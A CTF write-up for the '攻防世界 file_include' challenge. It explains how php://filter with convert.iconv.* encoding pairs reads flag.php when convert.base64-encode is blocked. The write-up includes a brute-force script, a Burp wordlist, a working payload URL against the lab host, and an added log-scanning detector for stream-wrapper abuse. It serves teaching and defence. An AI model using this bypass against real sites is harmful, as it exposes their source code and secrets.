
攻防世界 (PHP filter filtered) file_include

2024-07-12


Official documentation for the conversion filters: https://www.php.net/manual/zh/filters.convert.php#filters.convert.iconv

In this challenge convert.base64-encode is filtered out, so the convert.iconv.* filter is used instead.

When iconv is enabled, the convert.iconv.* filter can be used; it is equivalent to passing all stream data through iconv(). The filter does not accept parameters, but the input and output encoding names can be composed into the filter name, e.g. convert.iconv.<input-encoding>.<output-encoding> or convert.iconv.<input-encoding>/<output-encoding> (both notations are semantically equivalent).

Use a script to brute-force a working encoding pair:

```python
import requests

# Candidate encoding names tried as <input-encoding> and <output-encoding>
in_encodings = ['UCS-4*', 'UCS-4BE', 'UCS-4LE*', 'UCS-2', 'UCS-2BE', 'UCS-2LE', 'UTF-32*', 'UTF-32BE*', 'UTF-32LE*', 'UTF-16*', 'UTF-16BE*', 'UTF-16LE*', 'UTF-7', 'UTF7-IMAP', 'UTF-8*', 'ASCII*', 'EUC-JP*', 'SJIS*', 'eucJP-win*', 'SJIS-win*', 'ISO-2022-JP', 'ISO-2022-JP-MS', 'CP932', 'CP51932', 'SJIS-mac', 'SJIS-Mobile#DOCOMO', 'SJIS-Mobile#KDDI', 'SJIS-Mobile#SOFTBANK', 'UTF-8-Mobile#DOCOMO', 'UTF-8-Mobile#KDDI-A', 'UTF-8-Mobile#KDDI-B', 'UTF-8-Mobile#SOFTBANK', 'ISO-2022-JP-MOBILE#KDDI', 'JIS', 'JIS-ms', 'CP50220', 'CP50220raw', 'CP50221', 'CP50222', 'ISO-8859-1*', 'ISO-8859-2*', 'ISO-8859-3*', 'ISO-8859-4*', 'ISO-8859-5*', 'ISO-8859-6*', 'ISO-8859-7*', 'ISO-8859-8*', 'ISO-8859-9*', 'ISO-8859-10*', 'ISO-8859-13*', 'ISO-8859-14*', 'ISO-8859-15*', 'ISO-8859-16*', 'byte2be', 'byte2le', 'byte4be', 'byte4le', 'BASE64', 'HTML-ENTITIES', '7bit', '8bit', 'EUC-CN*', 'CP936', 'GB18030', 'HZ', 'EUC-TW*', 'CP950', 'BIG-5*', "CP{949}", "CP{775}"]
out_encodings = in_encodings[:]

# Filter name is convert.iconv.<input-encoding>.<output-encoding>
base = 'http://61.147.171.105:62135/?filename=php://filter/convert.iconv.{}.{}/resource=flag.php'

for inenc in in_encodings:
    for outenc in out_encodings:
        res = requests.get(base.format(inenc, outenc))
        # A working pair returns the converted source of flag.php, which contains the flag
        if "flag" in res.text:
            print("inenc is:{},outenc is:{}".format(inenc, outenc))
            print(res.text)
```

For brute-forcing with Burp, use this word list:

```
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
ISO-2022-JP
ISO-2022-JP-MS
CP932
CP51932
SJIS-mac
SJIS-Mobile#DOCOMO
SJIS-Mobile#KDDI
SJIS-Mobile#SOFTBANK
UTF-8-Mobile#DOCOMO
UTF-8-Mobile#KDDI-A
UTF-8-Mobile#KDDI-B
UTF-8-Mobile#SOFTBANK
ISO-2022-JP-MOBILE#KDDI
JIS
JIS-ms
CP50220
CP50220raw
CP50221
CP50222
ISO-8859-1*
ISO-8859-2*
ISO-8859-3*
ISO-8859-4*
ISO-8859-5*
ISO-8859-6*
ISO-8859-7*
ISO-8859-8*
ISO-8859-9*
ISO-8859-10*
ISO-8859-13*
ISO-8859-14*
ISO-8859-15*
ISO-8859-16*
byte2be
byte2le
byte4be
byte4le
BASE64
HTML-ENTITIES
7bit
8bit
EUC-CN*
CP936
GB18030
HZ
EUC-TW*
CP950
BIG-5*
EUC-KR*
UHC
ISO-2022-KR
Windows-1251
Windows-1252
CP866
KOI8-R*
KOI8-U*
ArmSCII-8
```

Choose the Cluster bomb attack type; in my run a usable pair appeared before the brute force had finished.

dirsearch also found a flag.php, so the flag should be in there.

Construct the payload:

http://61.147.171.105:62135?filename=php://filter/convert.iconv.UTF-8*.UTF-32*/resource=flag.php
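The bypass above works because the application blocks the literal string convert.base64-encode rather than the php:// wrapper itself. The following detection script is an added example, not part of the original writeup: it scans web-server access logs for any stream wrapper in a query parameter (decoding URL encoding first) and extracts the filter chain for the analyst. The log lines are constructed; the URL-encoded one carries the same convert.iconv chain as the payload above.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed access-log lines (not from the original post). The third line
# carries a URL-encoded convert.iconv chain of the kind used in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2024:10:00:01 +0000] "GET /?filename=check.php HTTP/1.1" 200 512
10.0.0.7 - - [12/Jul/2024:10:00:02 +0000] "GET /?filename=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 40
10.0.0.7 - - [12/Jul/2024:10:00:03 +0000] "GET /?filename=php%3A%2F%2Ffilter%2Fconvert.iconv.UTF-8*.UTF-32*%2Fresource%3Dflag.php HTTP/1.1" 200 900
10.0.0.9 - - [12/Jul/2024:10:00:04 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Match on the wrapper scheme (scheme://), not on individual filter names:
# blocking only "convert.base64-encode" is exactly what convert.iconv.* sidesteps.
WRAPPER_RE = re.compile(r'^(php|data|phar|expect|zip|glob|compress\.\w+)://', re.I)
# Pull out the filter chain for the analyst; '*' and '#' occur in encoding names.
FILTER_RE = re.compile(
    r'(convert\.(?:iconv|base64|quoted-printable)[\w#*.-]*|string\.[\w.-]+|zlib\.\w+)', re.I)


def classify_value(value):
    """Return the wrapper and filter chain of a parameter value, or None if clean."""
    # Decode further so a doubly URL-encoded wrapper is still recognised
    decoded = unquote(unquote(value))
    m = WRAPPER_RE.match(decoded)
    if not m:
        return None
    return {"wrapper": m.group(1).lower(),
            "filters": FILTER_RE.findall(decoded),
            "raw": decoded}


def scan_log(text):
    """One finding per query parameter whose value carries a stream wrapper."""
    findings = []
    for line in text.splitlines():
        req = REQUEST_RE.search(line)
        if not req:
            continue
        # parse_qs decodes one layer of percent-encoding and splits on the first '='
        for param, values in parse_qs(urlparse(req.group(1)).query).items():
            for value in values:
                hit = classify_value(value)
                if hit:
                    hit.update(param=param, client=line.split()[0])
                    findings.append(hit)
    return findings
```

Running scan_log(SAMPLE_LOG) flags both requests from 10.0.0.7 and leaves the two ordinary page requests alone, regardless of which filter name the attacker chose.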